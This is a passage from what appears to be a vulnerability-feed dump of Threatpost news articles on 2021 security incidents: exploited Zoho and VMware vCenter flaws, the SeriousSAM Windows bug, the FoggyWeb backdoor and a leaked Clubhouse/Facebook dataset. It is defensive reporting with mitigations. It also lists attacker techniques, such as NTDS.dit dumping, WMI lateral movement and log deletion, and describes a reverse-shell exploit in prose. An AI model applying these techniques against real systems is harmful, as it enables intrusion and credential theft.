webshell.\n\nThe advisory provided this laundry list of tactics, techniques and procedures (TTPs) being used by threat actors to exploit the vulnerability:\n\n * WMI for lateral movement and remote code execution (wmic.exe)\n * Using plaintext credentials acquired from compromised ADSelfService Plus host\n * Using pg_dump.exe to dump ManageEngine databases\n * Dumping NTDS.dit and SECURITY/SYSTEM/NTUSER registry hives\n * Exfiltration through webshells\n * Post-exploitation activity conducted with compromised U.S. 
infrastructure\n * Deleting specific, filtered log lines\n\n## Mitigations\n\nOrganizations that detect indicators of compromise (IoC) around their ManageEngine ADSelfService Plus installations \u201cshould take action immediately,\u201d the trio of agencies instructed.\n\n\u201cFBI, CISA, and CGCYBER strongly urge users and administrators to update to ADSelfService Plus build 6114,\u201d the trio stated. They also strongly urged organizations to keep ADSelfService Plus away from direct access via the internet.\n\nThey\u2019re also strongly recommending domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## This One Will Hurt\n\nJake Williams, co-founder and CTO at incident response firm BreachQuest, said that organizations should take note of the fact that threat actors have been using webshells as a post-exploitation payload. In the case of the exploitation of this Zoho flaw, they\u2019re using webshells disguised as certificates: something that security teams should be able to pick up on in web server logs, but \u201conly if organizations have a plan for detection.\u201d\n\nNo time like the present to start, he told Threatpost on Thursday: \u201cGiven that this will certainly not be the last vulnerability that results in web shell deployment, organizations are advised to baseline normal behavior in their web server logs so they can quickly discover when a web shell has been deployed.\u201d\n\nFinding a critical vulnerability in the system intended to help your employees manage and reset their passwords is \u201cexactly as bad as it sounds,\u201d noted Oliver Tavakoli, CTO at cybersecurity firm Vectra. \u201cEven if the ADSelfService Plus server was not accessible from the internet, it would be accessible from any compromised laptop. 
Recovery will be expensive \u2013 \u2018domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets\u2019 are certainly disruptive by themselves, and the APT groups may have established other means of persistence in the intervening time.\u201d\n\nThis ManageEngine vulnerability is the fifth instance of similarly critical vulnerabilities from ManageEngine this year, noted Sean Nikkel, senior cyber threat intel analyst at digital risk protection provider Digital Shadows. Unfortunately but predictably, given how much access attackers can get out of exploiting a vulnerability like this, we can likely expect more widespread exploitation of this and previous bugs, \u201cgiven the interactivity with Microsoft system processes.\u201d\n\nNikkel continued with yet another gloomy prediction: \u201cThe observation that APT groups are actively exploiting CVE-2021-40539 should highlight the potential exposure it might cause. If trends are consistent, extortion groups will likely seek exploitation for ransomware activity in the not-so-distant future,\u201d he mused.\n\nAll of which points to what CISA et al. have been urging about these vulnerabilities: namely, patch fast. 
\u201cUsers of Zoho\u2019s software should apply patches immediately to avoid the types of compromise described in the CISA bulletin,\u201d Nikkel said.\n\n## See Something, Say Something\n\nOrganizations should immediately report any of the following to [CISA](<https://us-cert.cisa.gov/report>) or the FBI:\n\n * Identification of IoC as outlined in the advisory.\n * Presence of webshell code on compromised ManageEngine ADSelfService Plus servers.\n * Unauthorized access to or use of accounts.\n * Evidence of lateral movement by malicious actors with access to compromised systems.\n * Other indicators of unauthorized access or compromise.\n\nHere are the reporting instructions:\n\n * Contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, include the incident date, time and location; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n * To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.\n * To report cyber incidents to the Coast Guard, contact the USCG National Response Center (NRC). Phone: 1-800-424-8802, email: NRC@uscg.mil.\n", "cvss3": {}, "published": "2021-09-16T21:09:23", "type": "threatpost", "title": "CISA, FBI: State-Backed APTs Are Exploiting Critical Zoho Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T21:09:23", "id": "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "href": "https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T16:20:45", "description": "VMware has released a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that includes patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey\u2019re all serious, but one \u2013 CVE-2021-22005, a critical arbitrary file upload vulnerability in the Analytics service that\u2019s been assigned the maximum CVSSv3 base score of 9.8 \u2013 is uber nasty.\n\n\u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d [said Bob Plankers](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>), Technical Marketing Architect at VMware.\n\nThe time to act is yesterday, Plankers wrote:\n\n> \u201cIn this era of ransomware it is 
safest to assume that an attacker is already inside your network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible.\u201d \u2014Bob Plankers, [VMware vSphere blog](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)\n\nThe security update addresses flaws in vCenter Server 6.5, 6.7, and 7.0.\n\n## When to Act?\n\nThe time to act is \u201cRight now,\u201d Plankers said. \u201cThese updates fix a critical security vulnerability, and your response needs to be considered at once.\u201d\n\nCVE-2021-22005 can be used to execute commands and executables on the vCenter Server Appliance. The company didn\u2019t tiptoe around the need for urgent action: Users should patch this vulnerability \u201cimmediately,\u201d VMware said in its [FAQ for VMSA-2021-0020](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>). The bug could have nasty repercussions, with exploits likely being hammered out \u201cminutes after the disclosure,\u201d it said:\n\n> \u201cThe ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\u201d [\u2014VMware FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>)\n\n## Assume That Attackers Are Already In Your System\n\nThis is a ransomware-friendly bug. 
VMware pointed to the [all-too-real threat](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>) of spiraling ransomware attacks: a growing risk that makes the \u201csafest stance\u201d the assumption that threat actors have already seized control of a desktop and a user account via [phishing](<https://threatpost.com/hackers-deep-sea-phishing/174868/>) or [spearphishing](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attacks, it said.\n\nIf a phishing attack has compromised an account(s), it means that the attacker \u201cmay already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\u201d VMware stressed.\n\nThis patch is considered an \u201cemergency change\u201d for organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types, the company said. An emergency change is one that must be introduced ASAP: for example, to resolve a major incident or implement a security patch.\n\nGranted, the decision on how to proceed is up to individual organizations, all of which have different environments, tolerance for risk, security controls and risk mitigation strategies. \u201cThe decision on how to proceed is up to you,\u201d VMware said, but still, given the severity, the company strongly recommends that users act.\n\n## The Other 18 Flaws Are Still Attacker Candy\n\nThe other security issues addressed in Tuesday\u2019s update have lower CVSS scores, but they\u2019re still ripe for the plucking by any attacker that\u2019s already compromised organizations\u2019 networks. 
That\u2019s one of the \u201cbiggest problems facing IT today,\u201d Plankers wrote: the fact that cyberattackers can persist on a compromised network, \u201cpatiently and quietly\u201d biding their time to eventually move laterally as they use compromised accounts to break into other systems over long periods of time.\n\n\u201cThey steal confidential data, intellectual property, and at the end install ransomware and extort payments from their victims,\u201d Plankers explained. \u201cLess urgent security vulnerabilities can still be potential tools in the hands of attackers, so VMware always recommends patching to remove them.\u201d\n\n## How to CYA (Cover Your Assets)?\n\nIf possible, the quickest way to resolve these serious issues is to patch vCenter Server. If that\u2019s not possible, VMware has workarounds, but only for the critical vulnerability, CVE-2021-22005. The workaround is listed in the [response matrix](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) at the bottom of VMware\u2019s VMware Security Advisory (VMSA), VMSA-2021-0020.\n\nThe workaround involves editing a text file on the VCSA and restarting services.\n\nStill, if possible, patching should be the first choice for a few reasons, Plankers advised:\n\n> First, if you can patch vCenter Server, do it. In general, this is the fastest way to resolve this problem, doesn\u2019t involve editing files on the vCenter Server Appliance (VCSA), and removes the vulnerabilities completely. Patching also carries less technical debt and less risk than using a workaround. \u2014Bob Plankers\n\nOther security controls that can help to protect users\u2019 networks until they can patch include using network perimeter access controls or the vCenter Server Appliance firewall to curtail access to the vCenter Server management interfaces. \u201cWe always strongly suggest limiting access to vCenter Server, ESXi, and vSphere management interfaces to only vSphere Admins,\u201d Plankers said. 
\u201cDrive all other workload management activity through the VM network connections. This simplifies access control and makes the RDP or ssh management traffic subject to other security controls, such as IDS/IPS and monitoring.\u201d\n\n## More Resources\n\nVMware offered this list of resources:\n\n * [Tips for Patching VMware vSphere](<https://core.vmware.com/tips-patching-vmware-vsphere>) (practical advice for ensuring patching success)\n * [VMware vSphere Security Configuration Guide](<https://core.vmware.com/security-configuration-guide>) (baseline security best practices for vSphere)\n * [VMware Ransomware Resource Center](<https://core.vmware.com/ransomware>) (discussion around tactics to help prevent, deter, and recover from attacks)\n * [VMware Ports & Protocols Firewalling Guidance](<https://ports.vmware.com/>) (ports.vmware.com)\n * [VMware Security Advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) (descriptions of the issues and workarounds)\n * [VMware Communities Forum Thread on VMSA-2021-0020](<https://via.vmw.com/vmsa-2021-0020-community>) (a great place to ask questions)\n * [VMSA-2021-0020: Questions & Answers](<https://via.vmw.com/vmsa-2021-0020-faq>) (questions VMware has received about this issue)\n * [VMSA-2021-0020: What You Need to Know](<https://via.vmw.com/vmsa-2021-0020-blog>) (Plankers\u2019 blog post)\n\n## Can\u2019t Patch What You Don\u2019t Know Is There\n\nGreg Fitzgerald, co-founder of the cybersecurity firm Sevco Security, noted that vulnerabilities such as this one point to the need to go far beyond patching this vCenter bug. \u201cIt\u2019s critical for enterprises to take the first step of patching this vCenter vulnerability, but it can\u2019t stop there,\u201d he told Threatpost on Wednesday.\n\nBeyond patching the initial vulnerability ASAP, enterprises would be well-advised to know what IT assets they have. 
Even the most fastidious approach to patch management \u201ccannot ensure that all enterprise assets are accounted for,\u201d he said via email. \u201cYou can\u2019t patch something if you don\u2019t know it\u2019s there, and attackers have figured out that the easiest path to accessing your network and your data is often through unknown or abandoned IT assets.\u201d\n", "cvss3": {}, "published": "2021-09-22T16:17:33", "type": "threatpost", "title": "VMware Warns of Ransomware-Friendly Bug in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T16:17:33", "id": "THREATPOST:14DD6B793DC77F25538436F7D14C922B", "href": "https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-22T20:05:59", "description": "A privilege escalation bug, affecting versions of Windows 10, received a workaround fix by Microsoft Wednesday to prevent attackers from accessing data and creating new accounts on compromised systems.\n\nThe bug, dubbed SeriousSAM, affects the Security Accounts Manager (SAM) database in all versions of Windows 10. The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers. A prerequisite for abusing the bug is that an adversary has either remote or local access to the vulnerable Windows 10 system.\n\nTracked as CVE-2021-36934, Microsoft said the vulnerability exists because of overly permissive Access Control Lists on multiple system files, including the SAM database. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d the [Microsoft bulletin explains](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). 
\n\nSimply stated, an attacker could leverage the bug to gain access to the SAM database of hashed credentials, which then could be cracked offline and used to bypass Windows 10 user access controls.\n\n## Proof-of-Concept Available\n\nThe bug is rated important in severity by Microsoft. The flaw was revealed to Microsoft by researcher Jonas Lyk over the weekend and made public Monday. [Proof-of-concept code](<https://github.com/GossiTheDog/HiveNightmare>) was published by researcher Kevin Beaumont to help network admins identify exposure to the bug.\n\nIn a Tweet by Lyk, the researcher said the bug also impacts pre-production versions of Windows 11 (slated to be released in October, 2021). \u201cFor some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file,\u201d [he tweeted](<https://twitter.com/jonasLyk/status/1417205166172950531>).\n\nThe researcher said the bug was discovered while tinkering with Windows 11. He explains that SAM database content, while not accessible on the OS, can be accessed when part of a Windows Shadow Volume Copy (VSS) backup. VSS is a service that allows automatic or manual real-time backups of system files (preserved in their current state) tied to a particular drive letter (volume).\n\nHe later identified that the same issue is present on Windows 10 systems dating back to 2018 (v1809).\n\n## **No Patch Available: Workaround Fix Recommended**\n\nFor this reason, Microsoft is recommending sysadmins delete the backup copies of the VSS files. 
The OS maker does not offer a patch for the bug, but rather a simple workaround.\n\nMicrosoft explains the two-step process as: \u201cDelete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\\system32\\config\u201d and \u201ccreate a new System Restore point (if desired).\u201d\n\nIt also cautions that deleting VSS shadow copies \u201ccould impact restore operations, including the ability to restore data with third-party backup applications.\u201d\n", "cvss3": {}, "published": "2021-07-22T12:57:11", "type": "threatpost", "title": "Microsoft Issues Windows 10 Workaround Fix for \u2018SeriousSAM\u2019 Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-22T12:57:11", "id": "THREATPOST:B0D084253CDDA9B0416ADB6DC22BEC9B", "href": "https://threatpost.com/win-10-serioussam/168034/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-29T14:13:43", "description": "The threat actors behind the notorious SolarWinds supply-chain attacks have dispatched new malware to steal data and maintain persistence on victims\u2019 networks, researchers have found.\n\nResearchers from the Microsoft Threat Intelligence Center (MSTIC) have observed the APT that Microsoft calls Nobelium using a post-exploitation backdoor dubbed FoggyWeb, to attack Active Directory Federation Services (AD FS) servers. 
AD FS enables single sign-on (SSO) across cloud-based apps in a Microsoft environment, by sharing digital identity and entitlement rights.\n\nThe attacks started as far back as April, Ramin Nafisi from MSTIC wrote in a [blog post](<https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/>) published Monday.\n\nNobelium is employing \u201cmultiple tactics to pursue credential theft\u201d to gain admin privileges to AD FS servers, Nafisi wrote. Then, once a server is compromised, the threat group deploys FoggyWeb \u201cto remotely exfiltrate the configuration database of compromised AD FS servers, decrypted [token-signing certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/token-signing-certificates>) and [token-decryption certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers>),\u201d he said, which can be used to penetrate into users\u2019 cloud accounts.\n\nIn addition to remotely exfiltrating sensitive data, FoggyWeb also achieves persistence and communicates with a command-and-control (C2) server to receive additional malicious components and execute them, Nafisi added.\n\n## **Backdoor Breakdown**\n\nNafisi provides a thorough breakdown of the sophisticated FoggyWeb backdoor, which operates by allowing abuse of the Security Assertion Markup Language (SAML) token in AD FS, he explained in the post.\n\n\u201cThe backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment,\u201d Nafisi wrote. 
\u201cThe custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.\u201d\n\nAttackers store the malware in an encrypted file called _Windows.Data.TimeZones.zh-PH.pri_, while the malicious file _version.dll_ acts as a loader. The DLL file leverages the CLR hosting interfaces and APIs to load FoggyWeb, a managed DLL, in the same Application Domain within which legitimate AD FS managed code is executed.\n\nIn this way, FoggyWeb gains access to the AD FS codebase and resources, including the AD FS configuration database. The malware also inherits AD FS service account permissions that are required to access the AD FS configuration database, Nafisi wrote.\n\nAdditionally, \u201cbecause FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatic access to the legitimate AD FS classes, methods, properties, fields, objects and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations,\u201d he added.\n\nFoggyWeb is also AD FS version-agnostic, which means it doesn\u2019t need to keep track of legacy versus modern configuration table names and schemas, named pipe names and other version-dependent properties of AD FS, Nafisi wrote.\n\n## **Malware Mitigation**\n\nMicrosoft has notified all customers observed being targeted or compromised by FoggyWeb, as well as included a comprehensive list of compromise indicators in the post.\n\nThe company also has recommended several mitigation actions for organizations, including: Auditing of on-premises and cloud infrastructure to identify any changes the actor might have made to maintain access; removing user and app access, reviewing configurations for each, and re-issuing new, strong credentials; and using a hardware security module to prevent the exfiltration of sensitive data.\n\nMicrosoft 
also is advising that all customers review their AD FS Server configuration and implement whatever changes are needed to secure the systems from attacks.\n\n## **Tracking a Known Threat Actor**\n\nMicrosoft researchers have been keeping a wary eye on Nobelium since the company [got caught up](<https://threatpost.com/microsoft-solarwinds-spy-attack-federal-agencies/162414/>) in the [SolarWinds attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that was first discovered late last year. They\u2019ve been tracking the threat group\u2019s activity and capabilities, which have expanded as the actors have built and deployed new malware.\n\nSince [the SolarWinds incident](<https://threatpost.com/dhs-sophisticated-cyberattack-foreign-adversaries/162242/>), researchers have observed Nobelium steadily building out its arsenal beyond the Sunburst/Solorigate backdoor and Teardrop malware it initially deployed in that attack, which reached tens of thousands of organizations around the globe (though fewer than 100 were selected by the attackers for actual breach and compromise).\n\nThe group used malware called [Raindrop](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) in those follow-on SolarWinds attacks, then later added [GoldMax, GoldFinder and Sibot](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) malware for layered persistence to its toolset.\n\nMicrosoft researchers also identified EnvyScout, BoomBox, NativeZone and VaporRage as four pieces of malware that were used in a Nobelium [email-based attack chain](<https://threatpost.com/solarwinds-nobelium-phishing-attack-usaid/166531/>) earlier this year.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. 
_[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T14:39:49", "type": "threatpost", "title": "SolarWinds Attackers Hit Active Directory Servers with FoggyWeb Backdoor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T14:39:49", "id": "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "href": "https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "On its own, the database of 3.8 billion phone numbers [leaked from ](<https://threatpost.com/clubhouse-users-data-hacker-forum/165354/>) social-media platform Clubhouse didn\u2019t have much value on the underground market. 
In fact, they were eventually dumped in a hacker forum for free.\n\nBut an enterprising threat actor has reportedly combined those phone numbers with 533 million [Facebook profiles leaked last April](<https://threatpost.com/facebook-accounts-leaked-check-exposed/165245/>) and is selling that enhanced trove of personally identifiable information (PII) to the highest bidder on the underground market.\n\nAccording to CyberNews, the combined [Clubhouse-Facebook database](<https://cybernews.com/security/3-8-billion-allegedly-scraped-and-merged-clubhouse-and-facebook-user-records-put-for-sale-online/>) includes names, phone numbers and other data, and is listed on an underground forum for $100,000 for all 3.8 billion entries, with smaller chunks of data available for less. Reportedly, the seller is still looking for buyers.\n\n## **Data Likely to Fuel ATO Attacks **\n\nThese credentials could quickly be leveraged for basic account takeover (ATO) attacks, according to Brian Uffelman, who is a security analyst for PerimeterX.\n\n\u201cThese stolen credentials are then used for credential-stuffing and ATO attacks, which can steal value, whether that is in the form of gift cards, credit-card numbers, loyalty points or making false purchases,\u201d Uffelman told Threatpost. \u201cATO attacks are a major threat to any business and all of this just creates more fuel to feed the ATO attack fire.\u201d\n\nHe added that it\u2019s much easier for cybercriminals to use stolen credentials than to do the work of trying to find holes in an organization\u2019s cybersecurity defenses. In fact, Uffelman pointed out that PerimeterX research showed that, of all login attempts measured in the second half of 2020, up to 85 percent were ATO attempts.\n\n\u201cOrganizations need to be aware of signs that they\u2019ve been attacked,\u201d Uffelman warned. 
\u201cThese can include surges in help-desk calls, spikes in password resets and inhuman user behaviors, such as thousands of login attempts on an account in a short time period and then take the appropriate action to block these attacks.\u201d\n\nUsers need to be aware of signs of breach, too, he added.\n\n\u201cConsumers need to ensure they are using varied and robust passwords across different websites and applications and lock down their credit reports as well.\u201d\n\n## **Facebook-Clubhouse Data Will Fuel Smishing Attacks **\n\n[Smishing](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>), or socially engineered phishing attempts conducted through SMS text messages, is a likely way cybercriminals will try to turn this database into profit, Jake Williams, from BreachQuest told Threatpost.\n\n\u201cWith this information, threat actors can send SMS phishes while spoofing the sender\u2019s number of a known friend,\u201d Williams said. \u201cA threat actor could go even further by using an SMS phishing pretext tailored to the victim based on their recent Facebook posts. Users are advised to be extremely careful in acting on unexpected SMS messages, even from senders they believe they know.\u201d\n\nWilliams added that Clubhouse users need to be on the lookout for suspicious texts, particularly those asking to transfer funds or confirm requests with a phone call, which are both common smishing tactics.\n\nAnd even if petty thieves don\u2019t see the value in the information, John Bambenek from Netenrich told Threatpost that he suspects intelligence agencies will take notice.\n\n\u201cBreaches like these often get sold at a discount because the ones who stole the data don\u2019t know what to do with it. In some cases, intelligence agencies will buy them if they have targets of interest on those platforms,\u201d Bambenek said. 
\u201cLikely the biggest use will go into the secondary consumer data market for those who want to build profiles for specific ad targeting.\u201d\n\nBeyond the immediate ramifications of the enhanced data falling into the wrong hands, Archie Agarwal from ThreatModeler pointed out that as these leaks continue, they will enable threat actors to create incredibly rich profiles of targets.\n\n\u201cAside from using data like this for more targeted scamming, there is a much larger concern,\u201d Agarwal told Threatpost. \u201cAs we share more and more personal information across an ever-growing list of social-media platforms, combining data gleaned from this type of scraping, together with leaked breach information and leveraging big-data analytics to mine it, could potentially reveal previously hidden information and behaviors on users.\u201d\n\n## **Users Have Accepted Risks **\n\nWhile the infosec community is alarmed by the prospect of all that data floating around, Roger Grimes from KnowBe4 doesn\u2019t expect the seller of the combined Clubhouse-Facebook data to get much financial gain out of the deal.\n\n\u201cMy bet is the seller doesn\u2019t get anywhere close to their $100,000 asking price. It\u2019s not a scarce resource,\u201d Grimes said in an email to Threatpost.\n\nHe also noted that while he agrees the data could fuel future smishing and other socially engineered attacks, he doesn\u2019t suspect much pushback from users.\n\n\u201cI think most people simply see this as a cost of using free internet services, Clubhouse or any other service,\u201d he said.\n", "cvss3": {}, "published": "2021-09-27T14:59:58", "type": "threatpost", "title": "3.8 Billion Users\u2019 Combined Clubhouse, Facebook Data Up for Sale", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T14:59:58", "id": "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "href": "https://threatpost.com/clubhouse-facebook-data-sale/175023/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "A fully working exploit for the critical CVE-2021-22005 remote code-execution (RCE) vulnerability in VMware vCenter is now public and being exploited in the wild.\n\nReleased on Monday by Rapid7 security engineer William Vu (who goes by the Twitter handle [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>)), this one\u2019s different from the incomplete proof-of-concept (PoC) exploit that began making the rounds on Friday. 
This variant can be used to open a reverse shell on a vulnerable server, allowing remote attackers to execute arbitrary code.\n\nThe vulnerability can be exploited by unauthenticated, remote users and allows attackers to upload a file to the vCenter Server analytics service.\n\n## UPDATE: Indicators of Exploit\n\nUPDATE: 092821 16:21 The attack team at the attack surface management firm Randori also has a working RCE exploit for CVE-2021-22005. Zero-day finder Aaron Portnoy detailed the exploit in his [attack notes](<https://www.randori.com/blog/technical-analysis-vcenter-vmsa-2021-0020/>), which also include detection methods and indicators of exploit that defenders can use to determine whether or not they\u2019ve been exploited by this bug.\n\nRandori confirmed what VMware, CISA and everybody else is saying: Namely, that these vulnerabilities \u201care very serious issues,\u201d and that affected organizations \u201cshould take immediate action to ensure the security of impacted devices.\u201d As it is, Portnoy said, CISA has predicted a high likelihood that foreign actors will move quickly to exploit the vulnerability.\n\nPortnoy also reiterated what VMware has already stressed: To wit, users should just assume that they\u2019re already infected. \u201cOrganizations that have or had affected vCenter versions exposed to the Internet, since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,\u201d he wrote.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nBelow is Vu\u2019s unredacted RCE proof-of-concept exploit against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled. 
Through [CEIP](<https://www.vmware.com/solutions/trustvmware/ceip.html>), VMware collects technical information about customers\u2019 use of its products. The CEIP is toggled [on as a default](<https://docs.vmware.com/en/VMware-Cloud-Foundation/4.0/com.vmware.vcf.vxrail.admin.doc/GUID-2B70F601-7D01-4609-AB1A-870A20485B67.html#:~:text=The%20Join%20the%20VMware%20Customer,Click%20Apply.>) setting in VMware Cloud Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png>)\n\nUnredacted RCE PoC against VMware\u2019s CEIP. Source: [wvu](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1>).\n\nNot that configurations matter with this vulnerability, VMware said last week. \u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d said Bob Plankers, technical marketing architect at VMware, when VMware [announced](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) the vulnerability on Tuesday.\n\nCERT/CC vulnerability analyst [Will Dormann](<https://twitter.com/wdormann>) noted that a redacted PoC that Vu listed at the start of a thread that began on Friday didn\u2019t require CEIP to be enabled. \u201cUnclear if THAT one is being used in the wild now,\u201d Dormann said.\n\nAccording to Vu\u2019s [technical analysis](<https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/>), the full, unredacted PoC starts with a request to create a directory for path traversal and schedules the spawn of a reverse shell.\n\n## History of a Bad Bug\n\n[VMware announced](<https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/>) CVE-2021-22005 a week ago, on Sept. 
21, as part of a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that included patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey were all serious, but CVE-2021-22005 \u2013 a critical arbitrary file upload vulnerability in the Analytics service \u2013 was assigned a CVSSv3 base score of 9.8 out of a maximum severity rating of 10. VMware urged users to declare an \u201cemergency change\u201d per [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types and to patch as soon as possible.\n\nAlso, on Friday, the Cybersecurity and Infrastructure Security Agency [(CISA) warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that VMware had confirmed that threat actors were exploiting the bug and that security researchers were reporting mass scanning for vulnerable vCenter servers and publicly available exploit code. 
CISA urged users with vulnerable systems to prioritize updating or to apply VMware\u2019s [workaround](<https://kb.vmware.com/s/article/85717>).\n\n\u201cDue to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,\u201d the advisory stated.\n\n## Know What Assets Need to Be Patched\n\nIn addition to prioritizing patching, it\u2019s important to know about all the assets that need to be patched, according to Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security.\n\n\u201cWe\u2019ve found that the vast majority of enterprises have robust patch management tools that are extremely effective at what they\u2019re designed to do: Applying patches to assets that security and IT teams know about,\u201d he told Threatpost via email on Tuesday.\n\nHe continued: \u201cCompanies are not getting breached because their patch management tools aren\u2019t good enough. They\u2019re getting breached because it\u2019s impossible to patch an asset you don\u2019t know is there in the first place. Maintaining an accurate IT asset inventory in a dynamic environment is really hard to do. Threat actors figured that out a long time ago and work around the clock to exploit it. The first step to combating threats like this one is to establish a continuously updated, accurate inventory of all enterprise assets to serve as a foundational control for your security program.\u201d\n", "cvss3": {}, "published": "2021-09-28T15:06:20", "type": "threatpost", "title": "Working PoC Is Out for VMware vCenter CVE-2021-22005 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T15:06:20", "id": "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "href": "https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 